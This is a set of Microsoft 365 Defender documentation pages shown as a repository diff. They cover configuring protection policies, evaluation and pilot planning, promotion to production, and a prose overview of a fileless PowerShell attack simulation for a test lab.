+It's *important* to be aware of the precedence these protection policies take when applied and enforced, as [Order and precedence of email protection - Office 365](../office-365-security/how-policies-and-protections-are-combined.md) explains.
+
+The table below provides references and additional guidance for configuring and assigning custom protection policies:
+
+|Policy |Description |Reference |
+|::|||
+|Connection Filtering | Identify good or bad source email servers by their IP addresses. | [Configure the default connection filter policy in EOP](../office-365-security/configure-the-connection-filter-policy.md) |
+|Anti-Malware | Protect users from email malware including what actions to take and who to notify if malware is detected. | [Configure anti-malware policies in EOP](../office-365-security/configure-anti-malware-policies.md) |
+|Anti-Spoofing | Protect users from spoofing attempts using spoof intelligence and spoof intelligence insights. | [Configure spoof intelligence in Defender for Office 365](../office-365-security/learn-about-spoof-intelligence.md) |
+|Anti-Spam | Protect users from email spam including what actions to take if spam is detected. | [Configure anti-spam policies in Defender for Office 365](../office-365-security/configure-your-spam-filter-policies.md) |
+|Anti-Phishing | Protect users from phishing attacks and configure safety tips on suspicious messages | [Configure anti-phishing policies in Defender for Office 365](../office-365-security/configure-mdo-anti-phishing-policies.md) |
+|Safe Attachments | Protect users from malicious content in email attachments and files in SharePoint, OneDrive, and Teams. | [Set up safe attachment policies in Defender for Office 365](../office-365-security/set-up-safe-attachments-policies.md) |
+|Safe Links | Protect users from opening and sharing malicious links in email messages or Office desktop apps. | [Set up safe links policies in Defender for Office 365](../office-365-security/set-up-safe-links-policies.md) |
+
+## Step 3: Try out capabilities ΓÇö Get familiar with simulation, monitoring, and metrics
+
+Now that your pilot is set up and configured, it's helpful to become familiar with the reporting, monitoring, and attack simulation tools that are unique to Microsoft Defender for Microsoft 365.
+
+|Capability |Description |More information |
+||||
+|Threat Explorer | Threat Explorer is a powerful near real-time tool to help Security Operations teams investigate and respond to threats and displays information about suspected malware and phish in email and files in Office 365, as well as other security threats and risks to your organization. | [Views in Threat Explorer and real-time detections ](../office-365-security/threat-explorer-views.md) |
+|Attack Simulator | You can use Attack Simulation Training in the Microsoft Defender 365 portal to run realistic attack scenarios in your organization which help you identify and find vulnerable users before a real attack impacts your environment. | [Attack Simulator in Microsoft Defender for Office 365](../office-365-security/attack-simulator.md) |
+|Reports dashboard | On the left navigation menu, click Reports and expand the Email & collaboration heading. The Email & collaboration reports are about spotting security trends some of which will allow you to take action (through buttons like 'Go to submissions'), and others that will show trends, like Mailflow status summary, Top Malware, Spoof detections, Compromised users, Mail latency, Safe Links and Safe attachments reports. These metrics are generated automatically. | [View Reports](../office-365-security/view-email-security-reports.md) |
+
+## Next steps
++
+[Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Promote To Production https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-promote-to-production.md
+
+ Title: Promote your Microsoft 365 Defender evaluation environment to Production, Microsoft 365 Defender evaluation, try an evaluation, keep an evaluation, production evaluation
+description: Use this article to promote your evals of MDI, MDO, MDE, and MCAS to your live environment in Microsoft 365 Defender or M365D.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
++
+f1.keywords:
+ - NOCSH
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Promote your Microsoft 365 Defender evaluation environment to production
+
+**Applies to:**
+- Microsoft 365 Defender
+
+To promote your Microsoft 365 Defender evaluation environment to production, first purchase the necessary license. Follow the steps in [Create the eval environment](eval-create-eval-environment.md) and purchase the Office 365 E5 license (instead of selecting Start free trial).
+
+Next, complete any additional configuration and expand your pilot groups until these have reached full production.
+
+## Microsoft Defender for Identity
+Defender for Identity doesn't require any additional configuration. Just make sure you've purchased the necessary licenses and installed the sensor on all of your Active Directory domain controllers and Active Directory Federation Services (AD FS) servers.
+
+## Microsoft Defender for Office 365
+After successfully evaluating or piloting MDO, it can be promoted to your entire production environment.
+1. Purchase and provision the necessary licenses and assign them to your production users.
+2. Re-run recommended baseline policy configurations (either Standard or Strict) against your production email domain or specific groups of users.
+3. Optionally create and configure any custom MDO policies against your production email domain or groups of users. However, remember that any assigned baseline policies will always take precedence over custom policies.
+4. Update the public MX record for your production email domain to resolve directly to EOP.
+5. Decommission any third-party SMTP gateways and disable or delete any EXO connectors associated with this relay.
+
+## Microsoft Defender for Endpoint
+To promote Microsoft Defender for Endpoint evaluation environment from a pilot to production, simply onboard more endpoints to the service using any of the [supported tools and methods](/defender-endpoint/onboard-configure).
+
+Use the following general guidelines to onboard more devices to Microsoft Defender for Endpoint.
+
+1. Verify that the device fulfills the [minimum requirements](/defender-endpoint/minimum-requirements).
+2. Depending on the device, follow the configuration steps provided in the onboarding section of the Defender for Endpoint portal.
+3. Use the appropriate management tool and deployment method for your devices.
+4. Run a detection test to verify that the devices are properly onboarded and reporting to the service.
+
+## Microsoft Cloud App Security
+Microsoft Cloud App Security doesn't require any additional configuration. Just make sure you've purchased the necessary licenses. If you've scoped the deployment to certain user groups, increase the scope of these groups until you reach production scale.
+
security Eval Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-overview.md
+
+ Title: Evaluate and pilot Microsoft 365 Defender, an XDR, to prevent, detect, investigate, respond, endpoints, identities, apps, email, collaborative applications, data.
+description: Plan your Microsoft 365 Defender trial lab or pilot environment to test and experience a security solution designed to protect devices, identity, data, and applications.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 06/25/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Evaluate and pilot Microsoft 365 Defender
+
+**Applies to:**
+
+- Microsoft 365 Defender
+
+Microsoft 365 Defender is an extended detection and response (XDR) solution that automatically collects, correlates and analyzes signal, threat and alert data from across your Microsoft 365 environment, including endpoint, email, applications and identities. It leverages extensive AI and automation to automatically stop attacks and remediate affected assets to a safe state. The following articles step you through the process of setting up a trial environment so you can evaluate the features and capabilities of Microsoft 365 Defender.
+
+As you walk through these articles, the steps will illustrate how to enable each component, configure settings, and begin monitoring with a pilot group. When youΓÇÖre ready, you can finish by promotion your evaluation environment directly into production.
+
+Microsoft recommends you create your evaluation in an existing production subscription of Office 365. This way you will gain real-world insights immediately and can tune settings to work against current threats in your environment. After youΓÇÖve gained experience and are comfortable with the platform, simply promote each component, one at a time, to production.
++
+## The anatomy of an attack
+
+Microsoft 365 Defender is a Cloud-based, unified, pre- and post-breach enterprise defense suite. It coordinates *prevention*, *detection*, *investigation*, and *response* across endpoints, identities, apps, email, collaborative applications, and all of their data.
+
+In this illustration an attack is underway. Phishing email arrives at the Inbox of an employee in your organization, who unknowingly opens the email attachment. This installs malware, which leads to a chain of events that could end with the theft of sensitive data. But in this case, Defender for Office 365 is in operation.
+
+![How Microsoft 365 Defender stops a chain of threats](../../media/defender/m365-defender-eval-threat-chain.png)
+
+In the illustration:
+
+- **Exchange Online Protection**, part of Microsoft Defender for Office 365, can detect the phishing email and use mail flow rules to make certain it never arrives in the Inbox.
+- **Defender for Office 365** safe attachments tests the attachment and determines it is harmful, so the mail that arrives either isn't actionable by the user, or policies prevent the mail from arriving at all.
+- **Defender for Endpoint** manages devices that connect to the corporate network and detect device and network vulnerabilities that might otherwise be exploited.
+- **Defender for Identity** takes note of sudden account changes like privilege escalation, or high-risk lateral movement. It also reports on easily exploited identity issues like unconstrained Kerberos delegation, for correction by the security team.
+- **Microsoft Cloud App Security** notices anomalous behavior like impossible-travel, credential access, and unusual download, file share, or mail forwarding activity and reports these to the security team.
+
+### Microsoft 365 Defender components
+
+Microsoft 365 Defender is made up of these security technologies, operating in tandem. You donΓÇÖt need all of these components to benefit from the capabilities of XDR and Microsoft 365 Defender. You will realize gains and efficiencies through using one or two as well.
+
+|Component |Description |Reference material |
+||||
+|Microsoft Defender for Identity | Microsoft Defender for Identity uses Active Directory signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization. | [What is Microsoft Defender for Identity?](/defender-for-identity/what-is) |
+|Exchange Online Protection | Exchange Online Protection is the native cloud-based SMTP relay and filtering service that helps protect your organization against spam and malware. | [Exchange Online Protection (EOP) overview - Office 365](../office-365-security/overview.md) |
+|Microsoft Defender for Office 365 | Microsoft Defender for Office 365 safeguards your organization against malicious threats posed by email messages, links (URLs) and collaboration tools. | [Microsoft Defender for Office 365 - Office 365](../office-365-security/overview.md) |
+|Microsoft Defender for Endpoint | Microsoft Defender for Endpoint is a unified platform for device protection, post-breach detection, automated investigation, and recommended response. | [Microsoft Defender for Endpoint - Windows security](../defender-endpoint/microsoft-defender-endpoint.md) |
+|Microsoft Cloud App Security | Microsoft Cloud App security is a comprehensive cross-SaaS solution bringing deep visibility, strong data controls, and enhanced threat protection to your cloud apps. | [What is Cloud App Security?](/cloud-app-security/what-is-cloud-app-security) |
+|Azure AD Identity Protection|Azure AD Identity Protection evaluates risk data from billions of sign-in attempts and uses this data to evaluate the risk of each sign-in to your environment. This data is used by Azure AD to allow or prevent account access, depending on how Conditional Access policies are configured. Azure AD Identity Protection is licensed separately from Microsoft 365 Defender. It is included with Azure Active Directory Premium P2.|[What is Identity Protection?](/azure/active-directory/identity-protection/overview-identity-protection)|
+| | | |
+
+## Microsoft 365 Defender architecture
+
+The diagram below illustrates high-level architecture for key Microsoft 365 Defender components and integrations. *Detailed* architecture for each Defender component, and use-case scenarios, are given throughout this series of articles.
+
+![Microsoft 365 Defender high-level architecture](../../media/defender/m365-defender-eval-architecture.png)
+
+In this illustration:
+
+- Microsoft 365 Defender combines the signals from all of the Defender components to provide extended detection and response (XDR) across domains. This includes a unified incident queue, automated response to stop attacks, self-healing (for compromised devices, user identities, and mailboxes), cross-threat hunting, and threat analytics.
+- Microsoft Defender safeguards your organization against malicious threats posed by email messages, links (URLs), and collaboration tools. It shares signals resulting from these activities with Microsoft 365 Defender. Exchange Online Protection (EOP) is integrated to provide end-to-end protection for incoming emails and attachments.
+- Microsoft Defender for Identity gathers signals from servers running Active Directory Federated Services (AD FS) and on-premises Active Directory Domain Services (AD DS). It uses these signals to protect your hybrid identity environment, including protecting against hackers that use compromised accounts to move laterally across workstations in the on-premises environment.
+- Microsoft Defender for Endpoint gathers signals from and protects devices used by your organization.
+- Microsoft Cloud App Security gathers signals from your organization's use of cloud apps and protects data flowing between your environment and these apps, including both sanctioned and unsanctioned cloud apps.
+- Azure AD Identity Protection evaluates risk data from billions of sign-in attempts and uses this data to evaluate the risk of each sign-in to your environment. This data is used by Azure AD to allow or prevent account access, depending on how Conditional Access policies are configured. Azure AD Identity Protection is licensed separately from Microsoft 365 Defender. It is included with Azure Active Directory Premium P2.
+
+Additional optional architecture components not included in this illustration:
+
+- Detailed signal data from all Microsoft Defender components can be integrated into Azure Sentinel and combined with other logging sources to offer full SIEM and SOAR capabilities and insights.
+
+## The evaluation process
+
+Microsoft recommends enabling the components of Microsoft 365 in the order illustrated:
+
+![Microsoft 365 Defender high-level evaluation process](../../media/defender/m365-defender-eval-process.png)
+
+The following table describes this illustration.
+
+| |Step |Description |
+||||
+|1 | [Create the evaluation environment](eval-create-eval-environment.md) |This step ensures you have the trial license for Microsoft 365 Defender. |
+|2 | [Enable Defender for Identity](eval-defender-identity-overview.md) | Review the architecture requirements, enable the evaluation, and walk through tutorials for identifying and remediating different attack types. |
+|3 | [Enable Defender for Office 365 ](eval-defender-office-365-overview.md) | Ensure you meet the architecture requirements, enable the evaluation, and then create the pilot environment. This component includes Exchange Online Protection and so you will actually evaluate *both* here. |
+|4 | [Enable Defender for Endpoint ](eval-defender-endpoint-overview.md) | Ensure you meet the architecture requirements, enable the evaluation, and then create the pilot environment. |
+|5 | [Enable Microsoft Cloud App Security](eval-defender-mcas-overview.md) | Ensure you meet the architecture requirements, enable the evaluation, and then create the pilot environment. |
+|6 | [Investigate and respond to threats](eval-defender-investigate-respond.md) | Simulate an attack and begin using incident response capabilities. |
+|7 | [Promote the trial to production](eval-defender-promote-to-production.md) | Promote the Microsoft 365 components to production one-by-one. |
+| | | |
+
+This is a commonly recommended order designed to gain the value of the capabilities quickly based on how much effort is typically required to deploy and configure the capabilities. For example, Defender for Office 365 can be configured much quicker than is required to enroll devices for Defender for Endpoint. Of course you can prioritize the components to meet your business needs and enable these in a different order.
+
+## Next steps
+
+[Create the Microsoft 365 Defender Evaluation Environment](eval-create-eval-environment.md)
security Generate Test Alert https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/generate-test-alert.md
- Title: Generate a test Microsoft 365 Defender alert
-description: Generate a test alert to try how your Microsoft 365 Defender lab environment works
-keywords: Microsoft 365 Defender simulation, try Microsoft 365 Defender, generate test alert in Microsoft 365 Defender, test alert in Microsoft 365 Defender evaluation lab
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-evalutatemtp
---
-# Generate a test alert in your Microsoft 365 Defender evaluation lab
---
-**Applies to:**
-- Microsoft 365 Defender-
-Now that you've completed your Microsoft 365 Defender evaluation lab setup and configuration, you can run a threat attack simulation to experience the detection, alert correlation, and self-healing remediation capabilities of the integrated security solution.
-
-1. Log on to https://security.microsoft.com
-2. On the Home page, look for a tile titled **Simulation**. Review the walkthrough guide for steps to create a test incident in Microsoft 365 Defender.
-<br>![Image of simulation card in the Microsoft 365 Security dashboard](../../media/mtp-eval-73.png) <br>
-
-## Next steps
-
-Browse through the [Microsoft 365 solution and architecture center](../../solutions/index.yml) to understand how to design the solution and architecture that is right for your organization.
security M365d Evaluation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-evaluation.md
- Title: Evaluate Microsoft 365 Defender
-description: Set up your Microsoft 365 Defender trial lab or pilot environment to try out and experience the security solution designed to protect devices, identity, data, and applications in your organization.
-keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-overview
- - m365solution-evalutatemtp
---
-# Create a Microsoft 365 Defender trial lab or pilot environment
---
-**Applies to:**
-- Microsoft 365 Defender--
-This guide helps you work across setting up a lab environment with users and groups, then guides you through the configuration of the capabilities in Microsoft 365 Defender so that you can mimic a threat attack and obtain a meaningful trial result.
-
-The purpose of creating this trial lab or pilot environment is to illustrate the comprehensive and integrated Microsoft 365 Defender capabilities. Experience how this intelligent security solution detects, prevents, automatically investigates, and responds to advanced threats your organization.
--
-You will be guided through the steps to start your Microsoft 365 Defender evaluation based on the recommended deployment paths. The goal is to help you set up the security solution either in a lab environment with a trial account, or in a pilot environment in production with a full license. Preparing your trial lab or pilot environment can help you present security operation use cases to decision makers in your organization. When youΓÇÖre done running your attack simulations and are satisfied with the results, you can fully deploy and operationalize it in your organization with the help of Microsoft Technical Sales Professionals or experts in your organization.
-
-This guide will help you:
-- Set up your lab server and computers-- Configure Active Directory with users and groups-- Set up and configure Microsoft Defender for Identity, Microsoft Defender for Office 365, Microsoft Defender for Endpoint, and Microsoft Cloud App Security-- Set up local policies for your server and computers-- Mimic a threat attack to generate a test incident or alert in Microsoft 365 Defender-
->[!IMPORTANT]
->For optimum results, follow the lab setup instructions as closely as possible.
--
-## Deployment phases
-
-There are three phases in creating a Microsoft 365 Defender trial lab environment.
-
-![Deployment phases: prepare, setup, onboard](../../media/evaluation-guide-phases.png)
-
-|Phase | Description |
-|:-|:--|
-|[Phase 1: Prepare](prepare-m365d-eval.md)| Learn what you need to consider when deploying Microsoft 365 Defender in a trial lab or pilot environment: <br><br>- Stakeholders and sign-off <br> - Environment considerations <br>- Access <br>- Azure Active Directory setup <br> - Configuration order
-|[Phase 2: Setup](setup-m365deval.md)| Take the initial steps to access Microsoft 365 Security Center to set up your Microsoft 365 Defender trial lab or pilot environment. You'll be guided to:<br><br>- Sign up for Microsoft 365 E5 Trial <br> - Configure domain<br>- Assign Microsoft 365 E5 licenses<br>- Complete the setup wizard in the portal|
-|[Phase 3: Configure & Onboard](config-m365d-eval.md) | Configure each Microsoft 365 Defender pillar and onboard endpoints. You'll be guided to:<br><br>- Configure Microsoft Defender for Office 365<br>- Configure Microsoft Cloud App Security<br>- Configure Microsoft Defender for Identity<br>- Configure Microsoft Defender for Endpoint
--
-After you've completed this guide, you would have identified the stakeholders involved and the required approvals, have the right access permissions, signed up for trial, configured domains and each of the Microsoft 365 Defender pillars, and your endpoints will be onboarded to the service.
-
-## Key capabilities
-
-While Microsoft 365 Defender provides many capabilities, the primary purpose of this deployment guide is to get you started by onboarding devices. In addition to onboarding, this guidance gets you started with the following capabilities.
--
-Capability | Description
-:|:
-Microsoft Defender for Office 365 | Helps protect your entire Office 365 envrionment from today's threats
-Microsoft Defender for Identity | Identifies and detects threats on compromised identities and malicious insider actions.
-Microsoft Cloud App Security | Provides rich visibility, control data travel, and detect cyberthreats across cloud services.
-Microsoft Defender for Endpoint | Prevents, detects, and provides response capabilities to advanced threats with comprehensive endpoint security.
--
-## In scope
-
-The following tasks are in scope for this guide:
-- Set up Azure Active Directory-- Set up Microsoft 365 Defender
- - Sign up for Microsoft 365 E5 Trial or use your full license if you're running a pilot
- - Configure domain
- - Assign Microsoft 365 E5 licenses
- - Completing the setup wizard within the portal
-- Configure all Microsoft 365 Defender pillars based on best practices
- - Microsoft Defender for Office 365
- - Microsoft Defender for Identity
- - Microsoft Cloud App Security
- - Microsoft Defender for Endpoint
-
-## Out of scope
-
-The following are out of scope of this deployment guide:
--- Configuration of third-party solutions that might integrate with Microsoft 365 Defender-- Penetration testing in production environment-
-## Next step
-[Phase 1: Prepare](prepare-m365d-eval.md)
-<br> Prepare your Microsoft 365 Defender trial lab or pilot environment
security M365d Pilot Close https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-pilot-close.md
- Title: Summarizing your pilot Microsoft 365 Defender project results
-description: Conclude your pilot Microsoft 365 Defender project by completing your scorecard, analyzing your report findings, and deciding how to move forward.
-keywords: Microsoft 365 Defender pilot, decide what to do next after pilot Microsoft 365 Defender project, what to do after evaluating Microsoft 365 Defender in production, transition from Microsoft 365 Defender pilot to deployment, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-scenario
- - m365solution-pilotmtpproject
---
-# Closing and summarizing your Microsoft 365 Defender pilot
---
-**Applies to:**
-- Microsoft 365 Defender---
-|[![Planning](../../medi) | ![Close and summarize](../../media/phase-diagrams/4-summary.png)<br/>Close and summarize|
-|--|--|--|--|
-|| | |*You are here!*|
--
-You're currently in the closing and summarizing phase.
-
-YouΓÇÖve just ran an advanced memory-only attack simulation that executed code remotely on a domain controller. YouΓÇÖve seen how Microsoft Defender for Endpoint and Microsoft Defender for Identity detect and create alerts on stealthy malicious activity. YouΓÇÖve also seen how alerts from different sources are delivered along with other contextual information into a single incident in the Microsoft 365 Security Center portal. Experiencing such integration enables SOC analysts to investigate and take necessary action. YouΓÇÖve also created an advanced hunting query that will identify inbound emails where the user opened or saved the attachment and created detection based on that query.
-
-YouΓÇÖve reached the end of the process after all tests have concluded.
-
-The final output should be:
--- A completed scorecard-- A detailed report of the findings of the pilot-- A decision on how to move forward-
-Present the reports from your final output to internal stakeholders (which youΓÇÖve identified during the [preparation](./prepare-m365d-eval.md) phase) and Microsoft contacts. Such an effort ensures that any feedback can be used to improve products and documentation.
-
-We hope you enjoyed this simulation. Start implementing what you've learned on a larger scale in your organization to get the most out of the integrated security solution.
-
-## Next step
-Learn more about the Microsoft 365 Defender pillars through the following interactive guides:
-- [Safeguard your organization with Microsoft Defender for Office 365](https://aka.ms/O365ATP-Interactive-Guide)-- [Detect suspicious activities and potential attacks with Microsoft Defender for Identity](https://aka.ms/AATP-Interactive-Guide)-- [Detect threats and manage alerts with Microsoft Cloud App Security](https://aka.ms/DetectThreatsAndAlertsMCAS-InteractiveGuide)-- [Investigate and remediate threats with Microsoft Defender for Endpoint](https://aka.ms/MDATP-IR-Interactive-Guide)
security M365d Pilot Plan https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-pilot-plan.md
- Title: Planning your pilot Microsoft 365 Defender project
-description: Plan your pilot Microsoft 365 Defender project with stakeholders to manage expectations and ensure successful outcome.
-keywords: Microsoft 365 Defender pilot, plan pilot Microsoft 365 Defender project, evaluate Microsoft 365 Defender in production, Microsoft 365 Defender pilot project, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-scenario
- - m365solution-pilotmtpproject
---
-# Planning your pilot Microsoft 365 Defender project
---
-**Applies to:**
-- Microsoft 365 Defender-
-|![Planning](../../medi)|
-|--|--|--|--|
-|*You are here!*| | | |
-
-You're currently in the planning phase.
-
-To ensure that your pilot project is a success, it is essential to plan thoroughly with and get approvals from your stakeholders in the beginning. Elements of planning include identifying scope, use cases, requirements, and success criteria.
-
-This guide walks you through how to plan your pilot project.
-
->[!IMPORTANT]
->For optimum results, follow the pilot instructions as closely as possible.
--
-## Scope
-
-The scope of the pilot will determine how broad the test will be, based on your environment and acceptable testing methods. Here are some example scopes to consider:
--- Development or test environment which includes endpoints, servers, domain controllers.-- Production environment with Microsoft 365, Azure, Active Directory services, endpoints, and servers-
->[!NOTE]
->If you donΓÇÖt have the full licenses yet, you can get trial licenses to [evaluate Microsoft 365 Defender](m365d-evaluation.md?ocid=cx-docs-MTPtriallab) ΓÇô plan, prepare, setup, configure, and run your pilot project. Your stakeholders will play a big role in helping facilitate the process from start to finish.
-
-The types of operating systems to be evaluated should also be defined based on the organizational makeup. This may include the following: [Mac endpoints](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-atp-mac#system-requirements), [Linux Servers](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-atp-linux#system-requirements), [Windows 10 endpoints](/windows/security/threat-protection/microsoft-defender-atp/minimum-requirements#supported-windows-versions), [Windows Server 2016](/windows/security/threat-protection/microsoft-defender-atp/minimum-requirements#supported-windows-versions).
-
-## Use cases
-
-Use cases represent statements of how the tool being tested is meant to be consumed by its intended users. These can be formulated as user stories from the point of view of a particular persona, such as a SOC analyst. For example:
--- As a SOC analyst, I need to view, correlate, assess and manage alerts and events across devices, users, and mailboxes in my network. [Incident management]-- As a SOC analyst, I must have the tool and process to automatically investigate and respond to malicious events in my network. [Auto IR]-- As a SOC analyst, I must search data from my environment to find known and potential threats, and suspicious activities. [Advanced Hunting]-
-Keep in mind that these use cases should be created within the parameters of the defined scope. If, for example, the scope of testing does not include an evaluation of tools such as Microsoft Cloud App Security, then use cases that rely on this as a data source should not be created.
-
-## Requirements
-
-From the list of use cases, you can start to create requirements. Requirements include features a tool must have to satisfy the use cases. These requirements can be broken down into categories such as configuration and maintenance, support for integrations, and feature-specific requirements like hunting ability and the ability to build custom alerts.
-
-## Test plan
-
-Depending on the requirements, different methods of testing may be appropriate. For instance, if the requirement is to evaluate the efficacy of Automated Remediation, the test plan needs to include steps to generate the behavior(s) that would trigger an automated remediation action within Microsoft 365 Defender. If the requirement is to detect a particular behavior or attack, then the test may involve more steps. The point is to have a plan in place to accurately test against your requirements.
-
-## Success criteria
-
-Success criteria is ultimately the bar set to measure against what you are testing. Whether you are testing Microsoft 365 Defender (or any other technology for that matter) against other tools or by itself, there must be some quantifiable criteria to determine the value the tool provides. Based on the scope, requirements, and testing plan, the success criteria will determine how to score the test. This should be less of a pass or fail and more of a weighted scoring based on your needs. For example, to be successful, a tool may need to score above 80% in certain critical areas you identify.
-
-## Scorecard
-
-One way to bring all elements of your plan together can be to create a scorecard. See a sample scorecard below:
-
-| Use case | Requirements | Configuration requirements | Test plan | Expected outcome | Test status | Score | Notes |
-|:-|:-|:-|:-|:-|:-|:-|:-|
-|Incident management|- Microsoft 365 Defender </br></br>- Microsoft Defender for Identity </br></br>- Microsoft Defender for Endpoint </br></br>- Microsoft Cloud App Security (optional)|See the [prerequisites](m365d-evaluation.md?ocid=cx-docs-MTPtriallab) for preparation, set-up, and configuration for details |[Simulate attack](m365d-pilot-simulate.md) <br></br>[Investigate the incident](./m365d-pilot-simulate.md#investigate-an-incident) |Investigators can understand the scope and impact of the incident and manage the incident||||
-|AutoIR|- Microsoft 365 Defender </br></br>- Microsoft Defender for Identity </br></br>- Microsoft Defender for Endpoint |See the [prerequisites](m365d-evaluation.md?ocid=cx-docs-MTPtriallab) for preparation, set-up, and configuration for details <br>Enable AutoIR |[Simulate attack](m365d-pilot-simulate.md) <br></br>[Automated investigation](m365d-pilot-simulate.md#automated-investigation-and-remediation) |Alerts and incidents are automatically remediated by Microsoft 365 Defender||||
-|Advanced hunting|- Microsoft 365 Defender </br></br>- Microsoft Defender for Endpoint </br></br>-Microsoft Defender for Office 365 |See the [prerequisites](m365d-evaluation.md?ocid=cx-docs-MTPtriallab) for preparation, set-up, and configuration for details|[Advanced hunting scenario](./m365d-pilot-simulate.md#advanced-hunting-scenario) |Investigators can find data through advanced hunting, pivoting to impacted entities, and by creating custom detections||||
-
-## Next step
-
-|![Preparation phase](../../medi) | Prepare your Microsoft 365 Defender pilot environment
-|:-|:--|
security M365d Pilot Simulate https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-pilot-simulate.md
- Title: Run your Microsoft 365 Defender attack simulations
-description: Run attack simulations for your Microsoft 365 Defender pilot project to see how it unfolds and is quickly remediated.
-keywords: Microsoft 365 Defender pilot attack simulation, run Microsoft 365 Defender pilot attack simulation, simulate attack in Microsoft 365 Defender, Microsoft 365 Defender pilot project, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-scenario
- - m365solution-pilotmtpproject
---
-# Run your Microsoft 365 Defender attack simulations
---
-|[![Planning](../../medi)|
-|--|--|--|--|
-|||*You are here!*||
-
-You're currently in the attack simulation phase.
-
-After preparing your pilot environment, it's time to test the Microsoft 365 Defender incident management and automated investigation and remediation capabilities. We'll help you to simulate a sophisticated attack that leverages advanced techniques to hide from detection. The attack enumerates opened Server Message Block (SMB) sessions on domain controllers and retrieves recent IP addresses of users' devices. This category of attacks usually doesn't include files dropped on the victim's deviceΓÇöthey occur solely in memory. They "live off the land" by using existing system and administrative tools and inject their code into system processes to hide their execution, Such behavior allows them to evade detection and persist on the device.
-
-In this simulation, our sample scenario starts with a PowerShell script. A user might be tricked into running a script. Or the script might run from a remote connection to another computer from a previously infected deviceΓÇöthe attacker attempting to move laterally in the network. Detection of these scripts can be difficult because administrators also often run scripts remotely to carry out various administrative activities.
-
-![Fileless PowerShell attack with process injection and SMB reconnaisance attack diagram](../../media/mtp/mtpdiydiagram.png)
-
-During the simulation, the attack injects shellcode into a seemingly innocent process. The scenario requires the use of notepad.exe. We chose this process for the simulation, but attackers would more likely target a long-running system process, such as svchost.exe. The shellcode then goes on to contact the attacker's command-and-control (C2) server to receive instructions on how to proceed. The script attempts executing reconnaissance queries against the domain controller (DC). Reconnaissance allows an attacker to get information about recent user login information. Once attackers have this information, they can move laterally in the network to get to a specific sensitive account
-
-> [!IMPORTANT]
-> For optimum results, follow the attack simulation instructions as closely as possible.
-
-## Simulation environment requirements
-
-Since you have already configured your pilot environment during the preparation phase, ensure that you have two devices for this scenario: a test device and a domain controller.
-
-1. Verify your tenant has [enabled Microsoft 365 Defender](m365d-enable.md#confirm-that-the-service-is-on).
-
-2. Verify your test domain controller configuration:
-
- - Device runs with Windows Server 2008 R2 or a later version.
- - The test domain controller to [Microsoft Defender for Identity](/azure/security-center/security-center-wdatp) and enable [remote management](/windows-server/administration/server-manager/configure-remote-management-in-server-manager).
- - Verify that [Microsoft Defender for Identity and Microsoft Cloud App Security integration](/cloud-app-security/mdi-integration) have been enabled.
- - A test user is created on your domain ΓÇô no admin permissions needed.
-
-3. Verify test device configuration:
-
- 1. Device runs with Windows 10 version 1903 or a later version.
-
- 1. Test device is joined to the test domain.
-
- 1. [Turn on Windows Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see this [troubleshooting topic](/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
-
- 1. Verify that the test device is [onboarded to Microsoft Defender for Endpoint)](/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
-
-If you use an existing tenant and implement device groups, create a dedicated device group for the test device and push it to top level in configuration UX.
-
-## Run the attack scenario simulation
-
-To run the attack scenario simulation:
-
-1. Log in to the test device with the test user account.
-
